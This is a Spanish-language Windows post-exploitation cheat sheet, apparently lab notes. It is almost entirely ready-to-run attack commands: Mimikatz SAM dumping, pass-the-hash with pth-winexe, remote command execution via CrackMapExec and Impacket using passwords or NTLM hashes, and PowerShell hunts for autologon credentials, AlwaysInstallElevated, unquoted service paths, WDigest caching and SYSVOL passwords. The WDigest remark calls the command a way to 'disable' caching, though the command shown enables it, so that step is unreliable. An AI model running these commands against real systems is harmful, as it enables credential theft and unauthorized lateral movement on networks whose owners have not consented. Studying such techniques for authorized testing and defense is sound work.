Mimikatz

Hacer dump del SAM.

privilege::debug
token::elevate
lsadump::sam

Pass the hash

pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd
whoami /priv

CrackMapExec

WMIexec

crackmapexec smb -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183
crackmapexec smb -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "cmd /c whoami" 192.168.204.183

ATexec

crackmapexec smb --exec-method atexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183
crackmapexec smb --exec-method atexec -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "whoami" 192.168.204.183

SMBexec

crackmapexec smb --exec-method smbexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183
crackmapexec smb --exec-method smbexec -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "whoami" 192.168.204.183

MMCexec

crackmapexec smb --exec-method mmcexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183
crackmapexec smb --exec-method mmcexec -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "whoami" 192.168.204.183

WINrm

crackmapexec winrm -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183
crackmapexec winrm -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "whoami" 192.168.204.183

Impacket

PSexec

/opt/impacket/examples/psexec.py "./Administrator:pass123"@192.168.204.183
/opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183

DCOMexec

/opt/impacket/examples/dcomexec.py "./Administrator:pass123"@192.168.204.183
/opt/impacket/examples/dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183

SMBexec

/opt/impacket/examples/smbexec.py "./Administrator:pass123"@192.168.204.183
/opt/impacket/examples/smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183

WMIexec

/opt/impacket/examples/wmiexec.py "./Administrator:pass123"@192.168.204.183
/opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183

ATexec

/opt/impacket/examples/atexec.py "./Administrator:pass123"@192.168.204.183 "whoami"
/opt/impacket/examples/atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183 "whoami"

Buscar credenciales auto-logon

gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon' | select "Default*"

Chequear si AlwaysInstallElevated esta habilitado.

gp 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated
gp 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated

Buscar path de servicio sin comillas.

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Comprobar LSASS WDigest caching.

(gp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest).UseLogonCredential

(si esta a 1 se puede usar mimikatz.)

Se puede deshabilitar y habra que reiniciar usando:

sp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest -name UseLogonCredential -value 1

Credenciales en SYSVOL y Group Policy Preferences.

Push-Location \\\\example.com\sysvol
gci * -Include *.xml,*.txt,*.bat,*.ps1,*.psm,*.psd -Recurse -EA SilentlyContinue | select-string password
Pop-Location